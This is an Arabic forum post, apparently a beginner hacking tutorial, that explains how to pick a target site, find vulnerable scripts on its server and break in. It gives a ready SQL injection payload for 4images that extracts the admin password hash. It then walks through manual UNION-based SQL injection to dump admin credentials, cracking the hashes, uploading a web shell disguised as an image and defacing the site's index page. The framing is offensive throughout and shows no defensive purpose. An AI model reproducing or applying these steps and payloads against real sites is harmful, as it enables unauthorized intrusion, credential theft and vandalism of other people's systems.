اليوم حبيت اشرح للشباب كيفية اكتشاف واستغلال ثغرات الsql
بسم الله الرحمن الرحيم
نحن تعودنا انو لما نبي نستهدف منتدى او موقع يبقى نطلع الايبي تبعو ولاتقولي كيف نطلوه ؟؟
مافي مشكل الايبي نطلعوه بالشكل التالي نفتح الدوس
starبعدين نرووح ل run بعدين نكتب cmdبعدين تطلع شاشة الدوس نكتب
ping site.com
site.com طبعا هي الموقع المستهدف
وبعدين لما نطلع الايبي بنروووح نتابع الاستهداف ونبحث عن ثغرات للسكريبتات يلي
مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف ولا تقول لي كيف نبحث عن
الثغرات ؟؟
مافي مشكل للبحث عن ثغرات السكريبتات نرووح اولا نطلع السكريبتات يلي مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف بالطريقة التالية :
نرووح لموقع
www.msn.comبعدين بمربع البحث نكتب كما يلي :
ip:125.20.04.13 powered
وطبعا نغير الاي بي الاي يلي استخرجناه قبل قليل
وبعدين تطلع سكريبتات كثييرة كمثال powered by 4images
4images هو نوع من انواع السكريبتات
ونجي لخطوة البحث عن ثغرات للسكريبت ودائما كمثال نأخد السكريبت 4images
ندهب الى موقع من مواقع السيكيرتي وكمثال نأخد الميليريوم
http://www.milw0rm.com/search.phpنكتب في خانة البحث اسم السكريبت يلي راح نشوف له ثغرت وحنا اخدنا 4images
نكتب اسمو ونظغط بحث
بعدين بيطلع لك ثغرات استغلالاتها مختلفة وان شاء الله نتطرق لكافة الاستغلالات
كمثال استغلال ثغرة 4images يكون زي كده
search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN
نكتب هالاستغلال خلف اسم السكريبت يعني زي كده
http://www.site.com/4images/search.p...ame=%2527ADMINوطبعا كلمة ADMIN نغيرها حسب اسم المدير
وبعدين راح يطلع لنا الباسوورد مشفر عادي نرووح نفكو ببرامج فك التشفير او مواقع فك التشفير كمثال نأخد
http://www.milw0rm.com/cracker/نحط الباسوورد المشفر وننتظر لحتى يفكو ولما يفكو ندخل اسم المدير والباسوورد ونضيف امتداد php من لوحة تحكم 4images
وبعدين نرفع شل عادي وكأننا نرفع في صورة
طيب لو ما لاقينا سكريبتات فيها ثغرات على السيرفر في هده الحالة نضطر الى اكتشاف الثغرات بنفسنا وفي هدا الدرس هوشرح لطريقة اكتشاف واستغلال ثغرات sql ولكننا انحرفنا عن درسنا قليلا ...... ما يهم
طريقة اكتشاف واستغلال ثغرات sql-injection
وهي ثغره مصابه بيها ما يقارب 60% من المواقع
وتسمى ثغره الحقن
اوكي كيف اعرفها او استغلها
طيب كيف نستخرج المواقع يلي فيها هده الثغرات
نستخرجها بالشكل التالي :
ندهب ل
www.msn.com وبمربع البحث نكتب بالشكل التالي
ip:125.20.04.13 . warning
او
ip:125.20.04.13 . home
او
ip:125.20.04.13 . puplic_html
طبعا نغير الاي بي الى ايبي الي استخرجناه بالاول
خلي نفرض انك لقيت موقع على السيرفر الي تريده فيه اخطاء
والاخطاء تجي غالبا بالشكل التالي كمثال
www.site.com/index.php?ver=21نروح وندور على متغير اوكي والمتغير هو دالي ياتي بعدها علامه =
مثل
www.site.com/index.php?ver=21شفتو هذا متغير var=21
زين احنا وجدنا متغير كيف ابحث عن ثغرات اني اقولك
نضيف علامه " بعد المتغير ونشوف اذا ظهر لي في الصفحه خطأ
يعني كيف انا اقولك هكذا
www.seit.com/index.php?ver=21"اشلون اعرف ظهر لي خطأ
يظهر في الصفحه هكذا
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
او في بعض الاحيان يضهر هكذا
You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the
right syntax to use near ''' at line 1
اوكي احنا وجدنا خطا كيف اخترق الموقع
واي لازم نعرف عدد الاعمده المصابه
زين اشلون اني اقولك
نجي على الموقع
نضيف علامه - السالب قبل الرقم
www.seit.com/index.php?ver=-21اوكي بعدها نكتب الامر
+union+select+
www.seit.com/index.php?ver=-21+union+select+واحد ذكي يقلي ليش كتبنا هذا الكلام ؟؟ اقلك هذا امر اتصال بالقاعده اوكي نكمل
نشوف عدد الاعمده المصابه اوكي نكمل بعد علامه + نكتب
1,2,3,4,5,6,7,8,9,10
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7اوككي نبدي من رقم واحد ونزيد يعني نضيف عامود واحد ونضغط انتر نشوف هل ذهب الخطا
وبعدين رقم اثنين وهكذا نزيد في عدد الاعمده حتي يذهب الخطا
خلي نفرض انا وصلنا العمود السابع وذهب الخطا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7يعني الخطا يلي شفناه اول مافتحنا الموقع يختفي ^^
نلا حض في مكان الخطا ضهرلنا رقم خلي نفرض ضهر لنا رقم 2
اوكي هذا هو المهم يعني في الاسغلال الي هو هذا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7راح نضع اوامرنا مكان الرقم 2
اوكي حبايب طبعا احنا مهمتنا ندور على اسم الادمن والباسورد طيب كيف
اني اقلك تضع مكان الرقم 2 التالي
username( )
مثل
www.seit.com/index.php?ver=-21+union+select+1, username( ),3,4,5,6,7
راح تشوف مكان الرقم 2 الي ضهر في الصفحه يضهر لي اسم انشاء الله هو اسم الادمن
كذالك الباسورد نفس الطريقه بدل username( )
نحط password( )
وبعدين يطلع لنا الباسوورد مشفر ويبقى نفك تشفييييره ونخترق الموقع ونرفع شل من لوحة التحكم
طبعا الموضوع مكتوووب بالحرف بالحرف يعني ظروري راح تكون هنالك اخطاء املائية
وفي الاخير حبيت اقول ان
هدا الدرس هو اتمام للدروووس التي بدأتها من قبل وهو الدرس السادس اكتشاف ثغرات الsql
والدرس كان مشرروح بالفيديو وبطريقة جيدة ولكن حدف عن طريق الخطا ^^مو مشكل ان شاء الله لما بيكون وقت اعيد شرحو بالفيديو
بعرف انو الدرس صعيييييييب نوع ما او غير مفهوم لكن والله الوقت الكافي ماعندي وراح اعيد درووس بالفيديو ونفس هدا الدرس ان شاء الله راح اشرحو بالفيديو وكدالك راح نتطرق لاكتشاف واستغلال انواع الثغرات
وان شاء الله نبدأ بالدروووس الجديدة هده الأيام من بداية الاستهداف حتى تعليق الأندكس
اتمنى اكون وفيت وكفيت طبعا ما حبيت اتعمق اكثر في الدرس لأنو ماراح يساعد المبتدئين
الأحد أكتوبر 16, 2022 8:34 pm من طرف ملك.المينا
.gif)
